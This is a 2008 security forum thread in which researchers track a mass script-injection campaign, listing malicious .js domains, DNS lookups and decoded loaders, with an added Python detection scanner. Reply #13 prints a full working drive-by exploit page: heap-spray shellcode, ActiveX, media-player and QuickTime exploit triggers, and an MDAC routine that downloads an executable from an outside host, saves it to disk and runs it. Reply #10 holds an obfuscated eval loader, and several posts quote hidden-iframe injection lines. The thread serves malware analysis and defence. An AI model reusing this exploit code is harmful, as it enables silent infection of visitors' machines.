Topic: just collection (about 0.js, 1.js, ip.js)


May 09, 2008, 08:47:06 am

pcaccent

Some domains are suspicious (after May 5 2008).

google : "<script src=http://" "0.js"
            "<script src=http://" "1.js"
            "<script src=http://" "2.js"
            "<script src=http://" "ip.js"
            "<script src=http://" f.js


<script src=hxxp://www.2117966.net/fuckjp.js></script>
<script src=hxxp://winzipices.cn/.js></script>
<script src=hxxp://c.uc8010.com/0.js></script>
<script src=hxxp://ucmal.com/0.js></script>
<script src=hxxp://rnmb.net/0.js></script>
<script src=hxxp://yl18.net/0.js></script>
<script src=hxxp://www.nmidahena.com/1.js></script>
<script src=hxxp://www.11910.net/1.js></script>
<script src=hxxp://xvgaoke.cn/1.js></script>
<script src=hxxp://www.nihaorr1.com/1.js></script>
<script src=hxxp://www.aspder.com/1.js></script>
<script src=hxxp://winzipices.cn/2.js></script>
<script src=hxxp://1.hao929.cn/ads.js></script>
<script src=hxxp://xprmn4u.info/f.js></script>
<script src=hxxp://www.414151.com/fjp.js></script>
<script src=hxxp://www.ririwow.cn/ip.js></script>    (Email: 123_at_q.com, Registration Date: 2008-05-08 12:16)
<script src=hxxp://www.bluell.cn/ip.js></script>
<script src=hxxp://9999.91.tc/ip.js></script>
<script src=hxxp://www1.xise.cn/ip/ip.js></script>
<script src=hxxp://bbs.jueduizuan.com/ip.js></script>

ririwow.cn: I found it in the morning of May 9, 2008 (GMT+9).


May 09, 2008, 11:16:02 am
Reply #1

sowhat-x

nihaorr1.com... this one was the domain
from which the massive injection/infection started a month ago...
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424

And nmidahena... this one was serving exploits a couple of months ago...
Seems like it's a small world... since from what I read, it's closely connected with the above...

May 09, 2008, 01:04:12 pm
Reply #2

MysteryFCM

Seems only a handful of those are still resolving;

Code:
219.232.233.82 c.uc8010.com
122.224.146.246 ucmal.com
122.224.146.246 www.ucmal.com
Error 9001 - Can't resolve host rnmb.net
Error 9001 - Can't resolve host www.rnmb.net
222.191.251.246 yl18.net
222.191.251.246 www.yl18.net
Error 9001 - Can't resolve host nmidahena.com
Error 9001 - Can't resolve host www.nmidahena.com
Error 9001 - Can't resolve host 11910.net
Error 9001 - Can't resolve host www.11910.net
159.226.8.140 xvgaoke.cn
159.226.8.140 www.xvgaoke.cn
60.169.3.130 nihaorr1.com
60.169.3.130 www.nihaorr1.com
60.172.219.4 aspder.com
60.172.219.4 www.aspder.com
60.191.239.229 winzipices.cn
60.191.239.229 www.winzipices.cn
Error 9001 - Can't resolve host hao929.cn
Error 9001 - Can't resolve host www.hao929.cn
Error 9001 - Can't resolve host 1.hao929.cn
Error 9001 - Can't resolve host www.1.hao929.cn
217.199.217.9 xprmn4u.info
217.199.217.9 www.xprmn4u.info
Error 9001 - Can't resolve host 414151.com
Error 9001 - Can't resolve host www.414151.com
Error 9001 - Can't resolve host ririwow.cn
Error 9001 - Can't resolve host www.ririwow.cn
Error 9001 - Can't resolve host bluell.cn
Error 9001 - Can't resolve host www.bluell.cn
60.190.243.202 91.tc
60.190.243.202 www.91.tc
60.190.243.202 9999.91.tc
219.232.224.81 xise.cn
219.232.224.81 www.xise.cn
219.232.224.81 www1.xise.cn
Error 9001 - Can't resolve host bbs.jueduizuan.com
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 09, 2008, 02:28:01 pm
Reply #3

pcaccent

suspicious

<script src=hxxp://www.caocaowow.cn/ip.js></script>
Registration Date: 2008-05-08 12:16

<script src=hxxp://www.msshamof.com/3rt.js></script>
<script src=hxxp://www.msshamof.com/4iu.js></script>
<script src=hxxp://www.z008.net/gm.js></script>
<script src=hxxp://b15.3322.org/e.js></script>
<script src=hxxp://free.hostpinoy.info/f.js></script>

"<script src=http://" ".js"    <- Google shows me 479 results.

<script src=hxxp://d39.6600.org/f.js></script>
<script src=hxxp://c11.8866.org/hxw/hx/f.js></script>

<script src=http:// f.js    <- Google shows me 379 results.

May 09, 2008, 02:38:04 pm
Reply #4

MysteryFCM

Quote
Host:  caocaowow.cn 
Current IP:  Could not resolve host 

Quote
Host:  www.caocaowow.cn 
Current IP:  222.12.88.52 
IP PTR:  ZP088052.ppp.dion.ne.jp 

May 10, 2008, 12:00:37 pm
Reply #5

pcaccent

hxxp://computershello.cn/1.js
   hxxp://computershello.cn/2.js
      document.write("hxxp://winzipices.cn/5.js");

computershello.cn:
     ip : 60.191.239.221
     Registered date : 2008-05-10 02:22:05

hxxp://www.ririwow.cn/ip.js   (or jp.js)


if you decode hxxp://www.ririwow.cn/index.htm, you can see this message
Quote
FUCK FRANCE!  FUCK CNN!  I WILL ATTACK you ALWAYS  !
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276_at_163.com

changed message
Quote
This is a mass invasion.        Safeguard the motherland's dignity!
FUCK FRANCE!  FUCK CNN!  I WILL ATTACK you ALWAYS  !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276_at_163.com

hxxp://bbs.jueduizuan.com/jp.js   (or ip.js)

hxxp://dj.jueduizuan.com/ri.exe

May 11, 2008, 09:38:26 am
Reply #6

pcaccent

Quote
<script src=http://www.wowyeye.cn/m.js></script>

decoded:
Quote
if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe src=hxxp://www.ririwow.cn/index.htm width=100 height=0></iframe>");}
google: 144 results

hxxp://dj.jueduizuan.com/ri.exe
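As an added defender-side example (not code from the thread or from any of its posters), the Python scanner below turns the indicators collected in the first post and the decoded loader in reply #6 into checks over a fetched page or script: an external `<script src>` with a one-to-three-character file name such as 0.js or ip.js, a zero-size iframe (present statically or emitted by document.write), and the zh-cn locale gate. The host names in the samples are constructed placeholders, and the hxxp defanging used in the thread is accepted so the thread's own lines can be fed in.

```python
import re
from urllib.parse import urlparse

# Patterns distilled from the thread: the injected tag points at an external
# host and a very short file name (0.js, 1.js, ip.js, f.js, m.js ...), the
# loaded script writes a zero-height iframe, and one loader skips 'zh-cn'
# browsers.  "h[tx]{2}p" also accepts the hxxp defanging used in the thread.
SHORT_JS_NAME = re.compile(r"^[a-z0-9]{1,3}\.js$", re.I)
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*[\"']?(h[tx]{2}ps?://[^\s\"'>]+)", re.I)
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
IFRAME_SRC = re.compile(r"\bsrc\s*=\s*[\"']?(h[tx]{2}ps?://[^\s\"'>]+)", re.I)
DIM_ZERO = re.compile(r"\b(?:width|height)\s*=\s*[\"']?0\b", re.I)
WRITE_CALL = re.compile(r"document\.write(?:ln)?\s*\(\s*([\"'])(.*?)\1\s*\)", re.I | re.S)
LANG_GATE = re.compile(r"navigator\.systemLanguage\s*==\s*[\"']zh-cn[\"']", re.I)


def scan_html(text, own_host):
    """Return (kind, detail) findings for one HTML page or one fetched .js file.
    own_host is the site being checked; scripts served from it are not flagged."""
    findings = []
    for m in SCRIPT_SRC.finditer(text):
        url = m.group(1)
        parsed = urlparse(re.sub(r"^h[tx]{2}p", "http", url, flags=re.I))
        name = parsed.path.rsplit("/", 1)[-1]
        if parsed.hostname and parsed.hostname != own_host and SHORT_JS_NAME.match(name):
            findings.append(("injected_script", url))
    # An iframe emitted by document.write()/writeln() is a stronger signal than
    # one sitting statically in the markup, so record where each one came from.
    write_spans = [m.span(2) for m in WRITE_CALL.finditer(text)]
    for m in IFRAME_TAG.finditer(text):
        tag = m.group(0)
        src = IFRAME_SRC.search(tag)
        if not src or not DIM_ZERO.search(tag):
            continue
        written = any(a <= m.start() < b for a, b in write_spans)
        findings.append(("written_hidden_iframe" if written else "hidden_iframe", src.group(1)))
    if LANG_GATE.search(text):
        findings.append(("locale_gate", "loader skips browsers whose systemLanguage is zh-cn"))
    return findings


# Constructed samples (placeholder hosts, not taken from the thread).
SAMPLE_PAGE = """<html><head>
<script type="text/javascript" src="http://cdn.example/js/jquery.min.js"></script>
<script src=http://victim.example/site.js></script>
<script src=http://injected.example/0.js></script>
</head><body><p>hello</p></body></html>"""

# Stand-in for a decoded loader of the kind shown in reply #6.
SAMPLE_LOADER = ("if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("
                 "\"<iframe src=http://landing.example/index.htm width=100 height=0></iframe>\");}")

# Stand-in for a loader that writes two zero-size iframes, as 7.js does in reply #9.
SAMPLE_WRITER = ('document.write("<iframe src=http://203.0.113.9/cgi-bin/index.cgi?x '
                 'width=0 height=0 frameborder=0></iframe>")\n'
                 'document.write("<iframe src=http://drop.example/d/1.php '
                 'width=0 height=0 frameborder=0></iframe>")')

if __name__ == "__main__":
    for label, sample in (("page", SAMPLE_PAGE), ("loader", SAMPLE_LOADER), ("writer", SAMPLE_WRITER)):
        for kind, detail in scan_html(sample, "victim.example"):
            print(f"{label}: {kind}: {detail}")
```

The file-name heuristic is deliberately narrow so that ordinary external libraries (jquery.min.js in the sample) are not reported; widen SHORT_JS_NAME if your own telemetry shows longer names being used.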

May 11, 2008, 01:03:32 pm
Reply #7

pcaccent

<script src=hxxp://9i5t.cn/a.js></script>

Quote
<script src=hxxp://9i5t.cn/a.js></script>
   document.write ('<script language=javascript src=hxxp://computershello.cn/g.js>"></script>');
      hxxp://computershello.cn/6.gif
            hxxp://computershello.cn/le.htm
                  NOD32 : JS/Exploit.CVE-2006-1359.AI
                  hxxp://61.188.38.158/images/test.exe
                  clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
         hxxp://computershello.cn/tt1.htm
                  MS07-017 exploit
                  hxxp://computershello.cn/tt.gif
                        hxxp://61.188.38.158/images/test.exe
         hxxp://computershello.cn/vv.js
                  I don't know
         hxxp://computershello.cn/old.htm
                  I don't know
         // hxxp://computershello.cn/new.htm
                  hxxp://computershello.cn/test.htm
                  hxxp://computershello.cn/pp.htm
                        hxxp://computershello.cn/pp.js
                              hxxp://computershello.cn/6.gif
                                    hxxp://computershello.cn/le.htm
                                    hxxp://computershello.cn/tt1.htm
                                    hxxp://computershello.cn/vv.js
                                    hxxp://computershello.cn/old.htm
                                    hxxp://computershello.cn/xin.htm
                                    hxxp://js.users.51.la/1871344.js
                                    hxxp://www.51.la/?1871344
                                    hxxp://img.users.51.la/1871344.asp
         hxxp://computershello.cn/xin.htm
               clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93
               hxxp://61.188.38.158/images/test.exe  
      hxxp://computershello.cn/6.gif
      hxxp://js.users.51.la/1871424.js

May 11, 2008, 09:02:49 pm
Reply #8

JohnC


May 12, 2008, 12:49:21 am
Reply #9

pcaccent

<script src=hxxp://www.direct84.com/7.js></script>

Quote
<script src=hxxp://www.direct84.com/7.js></script>
      document.write("<iframe src=hxxp://66.36.254.4/cgi-bin/index.cgi?zibzib width=0 height=0 frameborder=0></iframe>")
      document.write("<iframe src=hxxp://direct84.com/d/1.php width=0 height=0 frameborder=0></iframe>")

May 12, 2008, 12:58:57 am
Reply #10

MysteryFCM

Code:
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.direct84.com/7.js
Server IP: 99.227.84.105 [ CPE0050047d48ef-CM0016b5316076.cpe.net.cable.rogers.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 12 May 2008
Time: 01:52:55:52
*****************************************************************
document.write("<iframe src=http://66.36.254.4/cgi-bin/index.cgi?zibzib width=0 height=0 frameborder=0></iframe>")
document.write("<iframe src=http://direct84.com/d/1.php width=0 height=0 frameborder=0></iframe>")

Code:
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://66.36.254.4/cgi-bin/index.cgi?zibzib
Server IP: 66.36.254.4 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 12 May 2008
Time: 01:53:35:53
*****************************************************************
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script type="text/javascript">
<!--
function G3K20Su53(H6U1P2tQ3,ATn7Koigy){var SA5yi7JD2 = new Array;var jUC7uLu8T = arguments.callee.toString() + location.href;var R1Y8C75ok = jUC7uLu8T.replace(/\W/g, "");var ynh74a78n = eval;R1Y8C75ok = R1Y8C75ok.toUpperCase();for(var aJrPPH7ks = 0; aJrPPH7ks < 256; aJrPPH7ks++) {SA5yi7JD2[aJrPPH7ks]=0;}var G4YmKx5D6 = Math.pow(2, 32);var Qi2qsaF4R = G4YmKx5D6 - 306674912;var BnFj4xWF0 = 1;for(var aJrPPH7ks = 128; aJrPPH7ks; aJrPPH7ks >>= 1) {BnFj4xWF0 = BnFj4xWF0 >>> 1 ^ (BnFj4xWF0 & 1 ? Qi2qsaF4R : 0);for(var j8SBk0Fn1 = 0; j8SBk0Fn1 < 256; j8SBk0Fn1 += aJrPPH7ks * 2) {var tiwS37EwT = j8SBk0Fn1 + aJrPPH7ks;SA5yi7JD2[tiwS37EwT] = SA5yi7JD2[j8SBk0Fn1] ^ BnFj4xWF0;if (SA5yi7JD2[tiwS37EwT] < 0) {SA5yi7JD2[tiwS37EwT] += G4YmKx5D6;}}}var Mf227XxKj = G4YmKx5D6 - 1;for(BnFj4xWF0 = 0; BnFj4xWF0 < R1Y8C75ok.length; BnFj4xWF0++) {var ebv8sk7T4 = (Mf227XxKj ^ R1Y8C75ok.charCodeAt(BnFj4xWF0)) & 255;Mf227XxKj = SA5yi7JD2[ebv8sk7T4] ^ Mf227XxKj >> 8 & 16777215;}Mf227XxKj = Mf227XxKj ^ (G4YmKx5D6 - 1);if (Mf227XxKj < 0) {Mf227XxKj += G4YmKx5D6;}Mf227XxKj = Mf227XxKj.toString(16).toUpperCase();while(Mf227XxKj.length < 8) {Mf227XxKj = "0" + Mf227XxKj;}var AltW1j1Wa = new Array;for(var aJrPPH7ks = 0; aJrPPH7ks < 8; aJrPPH7ks++) {AltW1j1Wa[aJrPPH7ks] = Mf227XxKj.charCodeAt(aJrPPH7ks);}var YUHuOVbmt = "";var KVT5YJ3Ck = 0;for(var aJrPPH7ks = 0; aJrPPH7ks < H6U1P2tQ3.length; aJrPPH7ks += 2){var tiwS37EwT = H6U1P2tQ3.substr(aJrPPH7ks, 2);var I5oY04X8x = parseInt(tiwS37EwT, 16);var AW5kX4rc7 = AltW1j1Wa[KVT5YJ3Ck];var LV62HKm5H = I5oY04X8x - AW5kX4rc7;if(LV62HKm5H < 0) {LV62HKm5H = LV62HKm5H + 256;}YUHuOVbmt += String.fromCharCode(LV62HKm5H);if(KVT5YJ3Ck + 1 == AltW1j1Wa.length) {KVT5YJ3Ck = 0;} else {KVT5YJ3Ck++;}}var i1mbL65F5 = 0;try {ynh74a78n(YUHuOVbmt);} catch(e) {i1mbL65F5 = 1;}try {if (i1mbL65F5) {window.location = "/";}} catch(e) {}}
//-->
</script>
</head>
<body onload="G3K20Su53('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')">

</body>
</html>


The following returned a 200 (OK) status code, but no content ......

Code:
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://direct84.com/d/1.php
Server IP: 172.163.165.232 [ ACA3A5E8.ipt.aol.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 12 May 2008
Time: 01:54:18:54
*****************************************************************

May 12, 2008, 01:03:18 am
Reply #11

sowhat-x

Heh, I was doing/wondering exactly the same thing,
if I had missed something somewhere there... probably it will come back in a couple of hours...

May 12, 2008, 01:08:26 am
Reply #12

MysteryFCM

Even more interesting, they're using two different servers (both home lines too) for the same domain (rogers.com for the www. and AOL for the PD).

I thought they'd have the same files on both but alas apparently not :(

May 12, 2008, 01:51:46 am
Reply #13

pcaccent

connected to hxxp://www.direct84.com/

Code:
<html>
<head>
<script language="JavaScript">
var mm = new Array();
var mem_flag = 0;

function h() { mm=mm;a=1;setTimeout("h()", 2000); }

function getb(b, bSize)
{while (b.length*2<bSize){b += b;}
b = b.substring(0,bSize/2);return b;}

function fEtEgRTe2(){
var zc = 0x0c0c0c0c;
var a = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
"%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u772F%u7777%u642E%u7269%u6365%u3874%u2E34%u6F63%u2F6D%u6F6C%u6461%u702E%u7068%u4D3F%u4953%u0045");
var heapBlockSize = 0x400000;
var pls = a.length * 2;
var bSize = heapBlockSize - (pls+0x38);
var b = unescape("%u0c0c%u0c0c"); b = getb(b,bSize);
heapBlocks = (zc - 0x400000)/heapBlockSize;

for (i=0;i<heapBlocks;i++){mm[i] = b + a;}

mem_flag = 1;
h();
return mm;
}

function NUkI1pMSJzW9(num)
{
if (num == 0) {
try {
var tmp = "\x0D\x0D\x0D\x0D";
var tmp_size = 1044;
var DXMedia = document.createElement("object");
DXMedia.setAttribute("classid", "clsid:201E"+"A564-A6"+"F6-11"+"D1-81"+"1D-00C"+"04FB"+"6BD36");
if (! mem_flag) fEtEgRTe2();
while(tmp.length < (tmp_size * 2)) tmp += tmp;
tmp = tmp.substring(0, tmp_size);
DXMedia.SourceUrl = tmp;
num = 255;
} catch(e) { }
if (num = 255){ setTimeout("NUkI1pMSJzW9(1)", 2000);} else{ NUkI1pMSJzW9(1);}
}else if(num == 1){
try{
pnghtml = '<embed autostart="true" src="buf.png" type="video/x-ms-wmv" width="1" height="1" controls="ImageWindow" console="cons"></EMBED>';
if (! mem_flag) fEtEgRTe2();
document.getElementById('BRB2vms').innerHTML = pnghtml;
num = 255;
} catch(e){}
if (num = 255){ setTimeout("NUkI1pMSJzW9(2)", 2000);} else{ NUkI1pMSJzW9(2);}
}else if(num == 2){
try{
emhtml = '<EMBED  width="1" height="1" SRC="------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"></EMBED>';
if (! mem_flag) fEtEgRTe2();
document.getElementById('BRB2vms').innerHTML = emhtml;
num = 255;
} catch(e){}
if (num = 255){ setTimeout("NUkI1pMSJzW9(3)", 2000);} else{ NUkI1pMSJzW9(3);}
}else if(num == 3){
try {
var qt = new ActiveXObject('Quick'+'Time.Qu'+'ickTime');
if (qt) {
var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
'<param name="src" value="qt.php">'+
'<param name="autoplay" value="true">'+
'<param name="loop" value="false">'+
'<param name="controller" value="true">'+
'</object>';
if (! mem_flag) fEtEgRTe2();
document.getElementById('BRB2vms').innerHTML = qthtml;
num = 255;
}
} catch(e) { }
}
}


function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}

return randomstring;
}

function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}

function XMLHttpDownload(xml, url) {

try {
xml.open("GET", url, false);
xml.send(null);

} catch(e) { return 0; }

return xml.responseBody;
}

function ADOBDStreamSave(o, name, data) {

try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }

return 1;
}

function ShellExecute(exec, name, type) {

if (type == 0) {
try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
try { exec.ShellExecute(name); return 1; } catch(e) { }
}

return(0);

}

function MDAC() {
var t = new Array('{BD96C5'+'56-65A3-11'+'D0-983A-00C04FC'+'29E30}', '{BD96C'+'556-65A3-11'+'D0-983A-00C0'+'4FC29E36}', '{AB9B'+'CEDD-EC7E-47'+'E1-9322-D4A21'+'0617116}', '{0006F'+'033-0000-0000-C000-000000'+'000046}', '{0006'+'F03A-0000-0000-C000-0000000'+'00046}', '{6e32'+'070a-766d-4ee6-879c-dc1fa'+'91d2fc3}', '{6414'+'512B-B978-451D-A0D8-FCFDF3'+'3E833C}', '{7F5B'+'7F63-F06F-4331-8A26-339E03'+'C0AE3D}', '{0672'+'3E09-F4C2-43'+'c8-8358-09FCD1D'+'B0766}', '{639F'+'725F-1B2D-48'+'31-A9FD-87484'+'7682010}', '{BA018'+'599-1DB3-44f'+'9-83B4-46145'+'4C84BF8}', '{D0C07'+'D56-7C69-43F1-B4'+'A0-25F5A1'+'1FAB19}', '{E8C'+'CCDDF-CA28-496b-B'+'050-6C07C962'+'476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://www.direct84.com/load.php?MSIE';

while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;

try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} catch(e) { a = null; }

if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microso"+"ft.XM"+"LHT"+"TP");
if (! v[0]) v[0] = CreateObject(a, "MSX"+"ML2.Se"+"rverXM"+"LHT"+"TP");
}

if (! v[1]) {
v[1] = CreateObject(a, "ADODB.Str"+"eam");
}

if (! v[2]) {
v[2] = CreateObject(a, "WSc"+"ript.Sh"+"ell");
if (! v[2]) {
v[2] = CreateObject(a, "Shel"+"l.Ap"+"pl"+"icati"+"on");
if (v[2]) n=1;
}
}
}

i++;
}

if (v[0] && v[1] && v[2]) {
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
var name = "c:\\sys"+GetRandString(4)+".exe";
if (ADOBDStreamSave(v[1], name, data) == 1) {
if (ShellExecute(v[2], name, n) == 1) {
ret=1;
}
}
}
}

return ret;
}

function start() {

if (! MDAC() ) { NUkI1pMSJzW9(0); }

}
</script>
</head>
<body onload="start()">

<H1>Not Found</H1><P>The requested URL / was not found on this server.</P>
<div id="BRB2vms"></div>
</body>
</html>

hm.....

download : ldr.exe

interesting: direct84.com is a USA server, not a China server.

Created : 07-May-2008
ip : 71.68.36.44

May 12, 2008, 01:54:34 am
Reply #14

MysteryFCM
